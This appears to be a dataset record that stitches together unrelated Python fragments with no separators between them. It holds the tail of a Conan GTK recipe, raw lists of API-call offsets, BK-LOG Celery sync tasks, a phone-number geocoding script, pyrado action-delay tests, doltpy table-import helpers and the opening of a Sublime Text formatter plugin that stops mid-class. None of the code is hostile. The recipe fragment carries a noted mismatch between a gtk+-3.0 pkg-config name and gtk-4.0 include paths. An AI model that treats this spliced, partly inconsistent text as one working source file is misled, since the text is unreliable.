        # pkg-config name below is gtk+-3.0 -- looks inconsistent; confirm
        # which GTK major version this recipe actually builds.
        self.cpp_info.names["pkg_config"] = "gtk+-3.0"
        if self.settings.os == "Macos":
            self.cpp_info.frameworks = ["AppKit", "Carbon"]
| [
"conans.tools.SystemPackageTool",
"os.rename",
"conans.errors.ConanInvalidConfiguration",
"os.path.join",
"conans.tools.get",
"conans.tools.which",
"conans.tools.RunEnvironment",
"conans.tools.collect_libs",
"conans.Meson"
] | [((2848, 2901), 'conans.tools.get', 'tools.get', ([], {}), "(**self.conan_data['sources'][self.version])\n", (2857, 2901), False, 'from conans import ConanFile, Meson, tools\n'), ((2965, 3013), 'os.rename', 'os.rename', (['extracted_dir', 'self._source_subfolder'], {}), '(extracted_dir, self._source_subfolder)\n', (2974, 3013), False, 'import os\n'), ((3063, 3074), 'conans.Meson', 'Meson', (['self'], {}), '(self)\n', (3068, 3074), False, 'from conans import ConanFile, Meson, tools\n'), ((4439, 4486), 'os.path.join', 'os.path.join', (['self._source_subfolder', '"""include"""'], {}), "(self._source_subfolder, 'include')\n", (4451, 4486), False, 'import os\n'), ((4926, 4950), 'conans.tools.collect_libs', 'tools.collect_libs', (['self'], {}), '(self)\n', (4944, 4950), False, 'from conans import ConanFile, Meson, tools\n'), ((1262, 1287), 'conans.tools.which', 'tools.which', (['"""pkg-config"""'], {}), "('pkg-config')\n", (1273, 1287), False, 'from conans import ConanFile, Meson, tools\n'), ((2714, 2826), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""GTK recipe is not yet compatible with Windows. Contributions are welcome."""'], {}), "(\n 'GTK recipe is not yet compatible with Windows. 
Contributions are welcome.'\n )\n", (2739, 2826), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4992, 5026), 'os.path.join', 'os.path.join', (['"""include"""', '"""gtk-4.0"""'], {}), "('include', 'gtk-4.0')\n", (5004, 5026), False, 'import os\n'), ((2114, 2139), 'conans.tools.SystemPackageTool', 'tools.SystemPackageTool', ([], {}), '()\n', (2137, 2139), False, 'from conans import ConanFile, Meson, tools\n'), ((2556, 2658), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""with_pango option is mandatory when with_wayland or with_x11 is used"""'], {}), "(\n 'with_pango option is mandatory when with_wayland or with_x11 is used')\n", (2581, 2658), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((3832, 3858), 'conans.tools.RunEnvironment', 'tools.RunEnvironment', (['self'], {}), '(self)\n', (3852, 3858), False, 'from conans import ConanFile, Meson, tools\n'), ((4194, 4234), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (4206, 4234), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
from concurrent.futures import ThreadPoolExecutor
from celery.schedules import crontab
from celery.task import periodic_task, task
from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler
from apps.utils.lock import share_lock
from apps.utils.log import logger
from apps.exceptions import ApiResultError
from apps.log_search.constants import BkDataErrorCode
from apps.log_search.models import LogIndexSet
@periodic_task(run_every=crontab(minute="*/10"))
@share_lock()
def sync_index_set_mapping_cache():
    """Periodic task (every 10 minutes, under a shared lock): refresh the
    field-mapping cache of every active index set.

    Each index set is refreshed concurrently in a thread pool; a failure
    for one index set is logged without aborting the rest of the batch.
    """
    logger.info("[sync_index_set_mapping_cache] start")
    active_ids = LogIndexSet.objects.filter(is_active=True).values_list("index_set_id", flat=True)

    def _refresh_one(index_set_id):
        # Calling .fields() repopulates the mapping cache for this index set.
        logger.info("[sync_index_set_mapping_cache] index_set({}) start".format(index_set_id))
        try:
            SearchHandler(index_set_id=index_set_id, search_dict={}).fields()
        except Exception as e:  # pylint: disable=broad-except
            logger.exception("[sync_index_set_mapping_cache] index_set({}) sync failed: {}".format(index_set_id, e))
        else:
            logger.info("[sync_index_set_mapping_cache] index_set({}) sync success".format(index_set_id))

    with ThreadPoolExecutor() as pool:
        pool.map(_refresh_one, active_ids)
    logger.info("[sync_index_set_mapping_cache] end")
@periodic_task(run_every=crontab(minute="0", hour="2"))
def sync_index_set_mapping_snapshot():
    """Periodic task (daily at 02:00): refresh the fields snapshot of every active index set."""
    logger.info("[sync_index_set_mapping_snapshot] start")
    index_set_list = LogIndexSet.objects.filter(is_active=True)
    for index_set in index_set_list:
        try:
            index_set.sync_fields_snapshot(pre_check_enable=False)
        except ApiResultError as e:
            # Case where the BkData platform reports that metadata cannot be fetched:
            # deactivate the index set so it is skipped in future runs.
            if e.code in [BkDataErrorCode.STORAGE_TYPE_ERROR, BkDataErrorCode.COULD_NOT_GET_METADATA_ERROR]:
                index_set.is_active = False
                index_set.save()
                logger.exception(
                    f"[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"
                )
            continue
        except Exception as e:  # pylint: disable=broad-except
            # Any other failure: log it and move on to the next index set.
            logger.exception(
                "[sync_index_set_mapping_snapshot] index_set({}) sync failed: {}".format(index_set.index_set_id, e)
            )
            continue
        logger.info("[sync_index_set_mapping_snapshot] index_set({}) sync success".format(index_set.index_set_id))
    logger.info("[sync_index_set_mapping_snapshot] end")
@task(ignore_result=True)
def sync_single_index_set_mapping_snapshot(index_set_id=None):  # pylint: disable=function-name-too-long
    """Async task: refresh the fields snapshot of a single index set.

    Looks up the index set by id; logs (without raising) when it does not
    exist or when the snapshot sync fails.
    """
    try:
        index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)
    except LogIndexSet.DoesNotExist:
        logger.exception(f"[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist")
    else:
        try:
            index_set_obj.sync_fields_snapshot()
        except Exception as e:  # pylint: disable=broad-except
            logger.exception(
                f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"
            )
        else:
            # BUG FIX: previously the success message was logged unconditionally,
            # even when sync_fields_snapshot() raised; it now runs only on success.
            logger.info(f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success")
| [
"celery.task.task",
"concurrent.futures.ThreadPoolExecutor",
"apps.log_search.models.LogIndexSet.objects.filter",
"apps.log_search.models.LogIndexSet.objects.get",
"apps.utils.log.logger.exception",
"apps.utils.log.logger.info",
"celery.schedules.crontab",
"apps.log_search.handlers.search.search_handl... | [((1998, 2010), 'apps.utils.lock.share_lock', 'share_lock', ([], {}), '()\n', (2008, 2010), False, 'from apps.utils.lock import share_lock\n'), ((4090, 4114), 'celery.task.task', 'task', ([], {'ignore_result': '(True)'}), '(ignore_result=True)\n', (4094, 4114), False, 'from celery.task import periodic_task, task\n'), ((2051, 2102), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_cache] start"""'], {}), "('[sync_index_set_mapping_cache] start')\n", (2062, 2102), False, 'from apps.utils.log import logger\n'), ((2847, 2896), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_cache] end"""'], {}), "('[sync_index_set_mapping_cache] end')\n", (2858, 2896), False, 'from apps.utils.log import logger\n'), ((2998, 3052), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_snapshot] start"""'], {}), "('[sync_index_set_mapping_snapshot] start')\n", (3009, 3052), False, 'from apps.utils.log import logger\n'), ((3074, 3116), 'apps.log_search.models.LogIndexSet.objects.filter', 'LogIndexSet.objects.filter', ([], {'is_active': '(True)'}), '(is_active=True)\n', (3100, 3116), False, 'from apps.log_search.models import LogIndexSet\n'), ((4034, 4086), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_snapshot] end"""'], {}), "('[sync_index_set_mapping_snapshot] end')\n", (4045, 4086), False, 'from apps.utils.log import logger\n'), ((2749, 2769), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (2767, 2769), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((1973, 1995), 'celery.schedules.crontab', 'crontab', ([], {'minute': '"""*/10"""'}), "(minute='*/10')\n", (1980, 1995), False, 'from celery.schedules import crontab\n'), ((2924, 2953), 'celery.schedules.crontab', 'crontab', ([], {'minute': '"""0"""', 'hour': '"""2"""'}), "(minute='0', hour='2')\n", (2931, 2953), False, 'from 
celery.schedules import crontab\n'), ((4253, 4303), 'apps.log_search.models.LogIndexSet.objects.get', 'LogIndexSet.objects.get', ([], {'index_set_id': 'index_set_id'}), '(index_set_id=index_set_id)\n', (4276, 4303), False, 'from apps.log_search.models import LogIndexSet\n'), ((4750, 4869), 'apps.utils.log.logger.info', 'logger.info', (['f"""[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success'\n )\n", (4761, 4869), False, 'from apps.utils.log import logger\n'), ((2127, 2169), 'apps.log_search.models.LogIndexSet.objects.filter', 'LogIndexSet.objects.filter', ([], {'is_active': '(True)'}), '(is_active=True)\n', (2153, 2169), False, 'from apps.log_search.models import LogIndexSet\n'), ((4349, 4455), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist'\n )\n", (4365, 4455), False, 'from apps.utils.log import logger\n'), ((3503, 3627), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"""'], {}), "(\n f'[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})'\n )\n", (3519, 3627), False, 'from apps.utils.log import logger\n'), ((4593, 4721), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}'\n )\n", (4609, 4721), False, 'from apps.utils.log import logger\n'), ((2372, 2428), 'apps.log_search.handlers.search.search_handlers_esquery.SearchHandler', 'SearchHandler', ([], 
{'index_set_id': 'index_set_id', 'search_dict': '{}'}), '(index_set_id=index_set_id, search_dict={})\n', (2385, 2428), False, 'from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler\n')] |
import phonenumbers
from phonenumbers import geocoder
phone = input('type phone number format(+551100000000): ')
try:
    # parse() raises NumberParseException for input that is not a plausible
    # phone number (e.g. missing the leading '+'); previously this crashed
    # the script with a traceback.
    phone_number = phonenumbers.parse(phone)
except phonenumbers.NumberParseException as exc:
    print(f'invalid phone number: {exc}')
else:
    # Describe the number's region, localized to Portuguese ('pt').
    print(geocoder.description_for_number(phone_number, 'pt'))
| [
"phonenumbers.parse",
"phonenumbers.geocoder.description_for_number"
] | [((130, 155), 'phonenumbers.parse', 'phonenumbers.parse', (['phone'], {}), '(phone)\n', (148, 155), False, 'import phonenumbers\n'), ((163, 214), 'phonenumbers.geocoder.description_for_number', 'geocoder.description_for_number', (['phone_number', '"""pt"""'], {}), "(phone_number, 'pt')\n", (194, 214), False, 'from phonenumbers import geocoder\n')] |
# Copyright (c) 2020, <NAME>, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of <NAME>, Honda Research Institute Europe GmbH,
# or Technical University of Darmstadt, nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <NAME>, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import pytest
from pyrado.spaces.box import BoxSpace
from pyrado.environment_wrappers.action_delay import ActDelayWrapper
from tests.environment_wrappers.mock_env import MockEnv
@pytest.mark.wrapper
def test_no_delay():
    """With delay=0, every action reaches the wrapped env immediately."""
    env = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wrapped = ActDelayWrapper(env, delay=0)
    # reset() initializes the internal action buffer
    wrapped.reset()
    # Actions must pass straight through to the inner environment
    wrapped.step(np.array([4, 1]))
    assert env.last_act == [4, 1]
    wrapped.step(np.array([7, 5]))
    assert env.last_act == [7, 5]
@pytest.mark.wrapper
def test_act_delay():
    """With delay=2, actions reach the wrapped env two steps late."""
    env = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wrapped = ActDelayWrapper(env, delay=2)
    # reset() fills the buffer with zero-actions
    wrapped.reset()
    # Each step, the env should see the action issued two steps earlier
    # (zero-actions for the first two steps).
    actions = [[0, 1], [2, 4], [1, 2], [2, 3]]
    expected = [[0, 0], [0, 0], [0, 1], [2, 4]]
    for act, exp in zip(actions, expected):
        wrapped.step(np.array(act))
        assert env.last_act == exp
@pytest.mark.wrapper
def test_reset():
    """reset() must clear the delay buffer back to zero-actions."""
    env = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wrapped = ActDelayWrapper(env, delay=1)
    wrapped.reset()
    wrapped.step(np.array([0, 4]))
    assert env.last_act == [0, 0]
    wrapped.step(np.array([4, 4]))
    assert env.last_act == [0, 4]
    # [4, 4] would arrive next, but resetting discards the buffered action
    wrapped.reset()
    wrapped.step(np.array([1, 2]))
    assert env.last_act == [0, 0]
    wrapped.step(np.array([2, 3]))
    assert env.last_act == [1, 2]
@pytest.mark.wrapper
def test_domain_param():
    """Setting the 'act_delay' domain parameter must change the buffer length."""
    env = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wrapped = ActDelayWrapper(env, delay=1)
    wrapped.reset()
    wrapped.step(np.array([0, 1]))
    assert env.last_act == [0, 0]
    wrapped.step(np.array([2, 4]))
    assert env.last_act == [0, 1]
    # Increase the delay via the domain parameter interface and start over
    wrapped.domain_param = {"act_delay": 2}
    wrapped.reset()
    # Now actions should arrive two steps late instead of one
    actions = [[1, 2], [2, 3], [8, 9]]
    expected = [[0, 0], [0, 0], [1, 2]]
    for act, exp in zip(actions, expected):
        wrapped.step(np.array(act))
        assert env.last_act == exp
| [
"numpy.array",
"pyrado.spaces.box.BoxSpace",
"pyrado.environment_wrappers.action_delay.ActDelayWrapper"
] | [((2046, 2079), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(0)'}), '(mockenv, delay=0)\n', (2061, 2079), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2416, 2449), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(2)'}), '(mockenv, delay=2)\n', (2431, 2449), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2922, 2955), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(1)'}), '(mockenv, delay=1)\n', (2937, 2955), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((3516, 3549), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(1)'}), '(mockenv, delay=1)\n', (3531, 3549), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2173, 2189), 'numpy.array', 'np.array', (['[4, 1]'], {}), '([4, 1])\n', (2181, 2189), True, 'import numpy as np\n'), ((2243, 2259), 'numpy.array', 'np.array', (['[7, 5]'], {}), '([7, 5])\n', (2251, 2259), True, 'import numpy as np\n'), ((2543, 2559), 'numpy.array', 'np.array', (['[0, 1]'], {}), '([0, 1])\n', (2551, 2559), True, 'import numpy as np\n'), ((2613, 2629), 'numpy.array', 'np.array', (['[2, 4]'], {}), '([2, 4])\n', (2621, 2629), True, 'import numpy as np\n'), ((2683, 2699), 'numpy.array', 'np.array', (['[1, 2]'], {}), '([1, 2])\n', (2691, 2699), True, 'import numpy as np\n'), ((2753, 2769), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (2761, 2769), True, 'import numpy as np\n'), ((3049, 3065), 'numpy.array', 'np.array', (['[0, 4]'], {}), '([0, 4])\n', (3057, 3065), True, 'import numpy as np\n'), ((3119, 3135), 'numpy.array', 'np.array', (['[4, 4]'], {}), '([4, 4])\n', (3127, 3135), True, 'import numpy as np\n'), ((3270, 3286), 'numpy.array', 'np.array', (['[1, 2]'], 
{}), '([1, 2])\n', (3278, 3286), True, 'import numpy as np\n'), ((3340, 3356), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (3348, 3356), True, 'import numpy as np\n'), ((3643, 3659), 'numpy.array', 'np.array', (['[0, 1]'], {}), '([0, 1])\n', (3651, 3659), True, 'import numpy as np\n'), ((3713, 3729), 'numpy.array', 'np.array', (['[2, 4]'], {}), '([2, 4])\n', (3721, 3729), True, 'import numpy as np\n'), ((3876, 3892), 'numpy.array', 'np.array', (['[1, 2]'], {}), '([1, 2])\n', (3884, 3892), True, 'import numpy as np\n'), ((3946, 3962), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (3954, 3962), True, 'import numpy as np\n'), ((4016, 4032), 'numpy.array', 'np.array', (['[8, 9]'], {}), '([8, 9])\n', (4024, 4032), True, 'import numpy as np\n'), ((2006, 2033), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2014, 2033), False, 'from pyrado.spaces.box import BoxSpace\n'), ((2376, 2403), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2384, 2403), False, 'from pyrado.spaces.box import BoxSpace\n'), ((2882, 2909), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2890, 2909), False, 'from pyrado.spaces.box import BoxSpace\n'), ((3476, 3503), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (3484, 3503), False, 'from pyrado.spaces.box import BoxSpace\n')] |
import csv
import datetime
import io
import logging
import os
import tempfile
from typing import Any, Callable, List, Mapping, Optional, Set
import pandas as pd # type: ignore
from doltpy.cli import Dolt
from doltpy.shared.helpers import columns_to_rows
logger = logging.getLogger(__name__)
# Supported `dolt table import` modes.
CREATE, FORCE_CREATE, REPLACE, UPDATE = "create", "force_create", "replace", "update"
# CLI flags passed to `dolt table import` for each mode.
IMPORT_MODES_TO_FLAGS = {
    CREATE: ["-c"],
    FORCE_CREATE: ["-f", "-c"],
    REPLACE: ["-r"],
    UPDATE: ["-u"],
}
def write_file(
    dolt: Dolt,
    table: str,
    file_handle: io.StringIO,
    # TODO what to do about this?
    filetype: str = "csv",
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import the contents of an in-memory file handle into a Dolt table."""

    def writer(filepath: str):
        # Dump the remaining contents of the handle into the temp import file.
        with open(filepath, "w") as out:
            out.write(file_handle.read())

    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_columns(
    dolt: Dolt,
    table: str,
    columns: Mapping[str, List[Any]],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a column-oriented mapping ({column name: values}) into a Dolt table.

    Every column must carry the same number of values; otherwise a
    ValueError is raised when the import file is written.
    """

    def writer(filepath: str):
        # All columns must be of equal length for a rectangular table.
        distinct_lengths = {len(values) for values in columns.values()}
        if len(distinct_lengths) != 1:
            raise ValueError("Must pass columns of identical length")
        with open(filepath, "w") as out:
            csv_writer = csv.DictWriter(out, columns.keys())
            rows = columns_to_rows(columns)
            csv_writer.writeheader()
            csv_writer.writerows(rows)

    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_rows(
    dolt: Dolt,
    table: str,
    rows: List[dict],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a list of row dicts into a Dolt table.

    :param dolt: Dolt repository wrapper to import into.
    :param table: target table name.
    :param rows: list of {column -> value} dicts; rows may have differing keys,
        the header is the union of all keys.
    :param import_mode: one of create/force_create/replace/update, or None to
        let the helper pick one automatically.
    :param primary_key: optional list of primary-key column names.
    :param commit: when True, commit the import.
    :param commit_message: commit message (a default is generated when omitted).
    :param commit_date: author date to stamp on the commit.
    """
    def writer(filepath: str):
        with open(filepath, "w") as f:
            fieldnames: Set[str] = set()
            for row in rows:
                fieldnames = fieldnames.union(set(row.keys()))
            # Fix: previously the header was taken directly from the set,
            # making the CSV column order nondeterministic from run to run;
            # sort for a stable, reproducible header.
            csv_writer = csv.DictWriter(f, sorted(fieldnames))
            csv_writer.writeheader()
            csv_writer.writerows(rows)
    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_pandas(
    dolt: Dolt,
    table: str,
    df: pd.DataFrame,
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a pandas DataFrame into a Dolt table.

    Rows missing a value in any primary-key column are dropped before the
    import. NOTE(review): with primary_key=None, ``dropna(subset=None)`` drops
    rows containing *any* NA value — confirm this is intended.

    :param dolt: Dolt repository wrapper to import into.
    :param table: target table name.
    :param df: the DataFrame to import (index is not written).
    :param import_mode: one of create/force_create/replace/update, or None to
        let the helper pick one automatically.
    :param primary_key: optional list of primary-key column names.
    :param commit: when True, commit the import.
    :param commit_message: commit message (a default is generated when omitted).
    :param commit_date: author date to stamp on the commit.
    """
    def _dump_frame(filepath: str):
        # Drop rows lacking a primary-key value, then write without the index.
        df.dropna(subset=primary_key).to_csv(filepath, index=False)

    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=_dump_frame,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def _import_helper(
    dolt: Dolt,
    table: str,
    write_import_file: Callable[[str], None],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
) -> None:
    """Shared implementation behind the write_* helpers.

    Writes the data to a temporary CSV via ``write_import_file``, invokes
    ``dolt table import`` with the flags for the (validated or inferred)
    import mode, optionally commits, and always removes the temp file.
    """
    import_mode = _get_import_mode_and_flags(dolt, table, import_mode)
    logger.info(f"Importing to table {table} in dolt directory located in {dolt.repo_dir()}, import mode {import_mode}")
    # Fix: tempfile.mktemp is deprecated and race-prone (the name can be
    # claimed by another process before use); mkstemp atomically creates the
    # file. Only the path is needed, so close the OS-level descriptor now.
    fd, fname = tempfile.mkstemp(suffix=".csv")
    os.close(fd)
    import_flags = IMPORT_MODES_TO_FLAGS[import_mode]
    try:
        write_import_file(fname)
        args = ["table", "import", table] + import_flags
        if primary_key:
            args += ["--pk={}".format(",".join(primary_key))]
        dolt.execute(args + [fname])
        if commit:
            msg = commit_message or f"Committing write to table {table} in {import_mode} mode"
            dolt.add(table)
            dolt.commit(msg, date=commit_date)
    finally:
        # Best-effort cleanup of the temporary import file.
        if os.path.exists(fname):
            os.remove(fname)
def _get_import_mode_and_flags(dolt: Dolt, table: str, import_mode: Optional[str] = None) -> str:
    """Validate or infer the import mode for ``table``.

    An explicitly supplied mode is validated against IMPORT_MODES_TO_FLAGS and
    returned unchanged. When no mode is given, "update" is chosen if the table
    already exists, otherwise "create".

    :raises ValueError: if an explicit mode is not one of the known modes.
    """
    import_modes = IMPORT_MODES_TO_FLAGS.keys()
    if import_mode and import_mode not in import_modes:
        raise ValueError(f"update_mode must be one of: {import_modes}")
    # Fix: previously this inference ran unconditionally, silently overwriting
    # an explicitly supplied (and already validated) mode. Only infer when the
    # caller did not provide one.
    if not import_mode:
        if table in [t.name for t in dolt.ls()]:
            logger.info(f'No import mode specified, table exists, using "{UPDATE}"')
            import_mode = UPDATE
        else:
            # Fix: this log message previously (wrongly) said "table exists".
            logger.info(f'No import mode specified, table does not exist, using "{CREATE}"')
            import_mode = CREATE
    return import_mode
| [
"logging.getLogger",
"os.path.exists",
"csv.DictWriter",
"doltpy.shared.helpers.columns_to_rows",
"tempfile.mktemp",
"os.remove"
] | [((267, 294), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (284, 294), False, 'import logging\n'), ((4902, 4932), 'tempfile.mktemp', 'tempfile.mktemp', ([], {'suffix': '""".csv"""'}), "(suffix='.csv')\n", (4917, 4932), False, 'import tempfile\n'), ((5424, 5445), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (5438, 5445), False, 'import os\n'), ((2046, 2070), 'doltpy.shared.helpers.columns_to_rows', 'columns_to_rows', (['columns'], {}), '(columns)\n', (2061, 2070), False, 'from doltpy.shared.helpers import columns_to_rows\n'), ((3129, 3158), 'csv.DictWriter', 'csv.DictWriter', (['f', 'fieldnames'], {}), '(f, fieldnames)\n', (3143, 3158), False, 'import csv\n'), ((5459, 5475), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (5468, 5475), False, 'import os\n')] |
# @author <NAME>
# @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
    """Routes formatting of a Sublime Text view to the formatter class
    registered for the view's syntax in the CodeFormatter settings."""

    def __init__(self, view, syntax=None):
        self.platform = sublime.platform()
        self.classmap = {}

        # Sublime Text version detection: an empty or >3000 build number
        # means ST3, otherwise assume ST2.
        self.st_version = 2
